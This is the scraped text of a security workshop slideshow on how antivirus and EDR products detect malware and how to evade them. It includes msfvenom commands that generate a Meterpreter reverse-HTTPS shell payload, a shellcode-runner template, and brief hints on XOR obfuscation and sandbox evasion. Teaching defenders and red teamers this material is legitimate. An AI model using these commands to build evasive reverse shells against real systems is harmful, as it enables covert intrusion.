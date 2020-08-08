Successfully reported this slideshow.
  1. 1. HOW THE ANTIVIRUSES WORKBEHIND THE AV LINE https://twitter.com/dawid_golak
  2. 2. BEHIND THE AV LINE ANTIVIRUSES https://www.av-comparatives.org/list-of-enterprise-av-vendors-pc/
  3. 3. BEHIND THE AV LINE BEYOND THE ANTIVIRUS, OR THE WORLD OF EDR ▸ Usually two components. ▸ Kernel mode (one or more drivers) - processes monitoring ▸ Usermode (usually as a service) - supporting function reinstall/update - API hooking in the process
  4. 4. AMSIANTIMALWARE SCAN INTERFACE
  5. 5. BEHIND THE AV LINE AMSI ▸ The Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product that's present on a machine. ▸ AMSI provides enhanced malware protection for your end-users and their data, applications, and workloads. https://github.com/BC-SECURITY/DEFCON27/blob/master/Introduction_to_AMSI_Bypasses_and_Sandbox_Evasion.pdf
  6. 6. BEHIND THE AV LINE WINDOWS COMPONENTS THAT INTEGRATE WITH AMSI ▸ User Account Control, or UAC (elevation of EXE, COM, MSI, or ActiveX installation) ▸ PowerShell (scripts, interactive use, and dynamic code evaluation) ▸ Windows Script Host (wscript.exe and cscript.exe) ▸ JavaScript and VBScript ▸ Ofﬁce VBA macros
  7. 7. BEHIND THE AV LINE AMSI https://github.com/BC-SECURITY/DEFCON27/blob/master/Introduction_to_AMSI_Bypasses_and_Sandbox_Evasion.pdf
  8. 8. BINARY VS SCRIPTING
  9. 9. STATIC DYNAMIC NETWORK CATCHME, IF YOU CAN
  10. 10. BEHIND THE AV LINE STATIC ANALYSIS ▸ Copy ▸ move ▸ delete ▸ view ▸ touch }
  11. 11. BEHIND THE AV LINE STATIC ANALYSIS - VIRUSTOTAL.COM
  12. 12. BEHIND THE AV LINE DYNAMIC ANALYSIS ▸ Sandbox
  13. 13. BEHIND THE AV LINE NETWORK ANALYSIS
  14. 14. BEHIND THE AV LINE NETWORK ANALYSIS
  15. 15. METASPLOIT HOW THE TEMPLATES WORK
  16. 16. BEHIND THE AV LINE MSF TEMPLATES ▸ msfvenom -p windows/[x86/x64]/meterpreter/reverse_https LHOST=10.0.2.16 LPORT=443 -f exe —o calc.exe ▸ /usr/share/metasploit-framework/data/templates/src/pe/exe #include <stdio.h> #deﬁne SCSIZE 4096 char payload[SCSIZE] = "PAYLOAD:"; char comment[512] = ""; int main(int argc, char **argv) { (*(void (*)()) payload)(); return(0); }
  17. 17. LET'S WALK THE WALK, AND STOP TALK THE TALK WORKSHOP
  18. 18. PE FILE
  19. 19. BEHIND THE AV LINE MSFVENOM SAMPLE - BYPASS STATIC ANALYSIS ▸ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.0.2.16 LPORT=443 -f hex ▸ xor [+hint]
  20. 20. BEHIND THE AV LINE MSFVENOM SAMPLE - BYPASS STATIC ANALYSIS i.e. windows defender: https://github.com/matterpreter/DefenderCheck
  21. 21. BEHIND THE AV LINE WHERE IS MY DATA ▸ char shellcode[] = “xfcx48x83x..x…..”; ▸ .text ▸ .data ▸ .rscr
  22. 22. BEHIND THE AV LINE BYPASS DYNAMIC ▸ hint 0x01
  23. 23. BEHIND THE AV LINE BYPASS DYNAMIC ▸ hint 0x02
  24. 24. BEHIND THE AV LINE BYPASS DYNAMIC ▸ hint 0x03
  25. 25. BEHIND THE AV LINE BYPASS DYNAMIC ▸ workstation ﬁngerprint
  26. 26. WHAT’S NEXT?
  27. 27. THX

×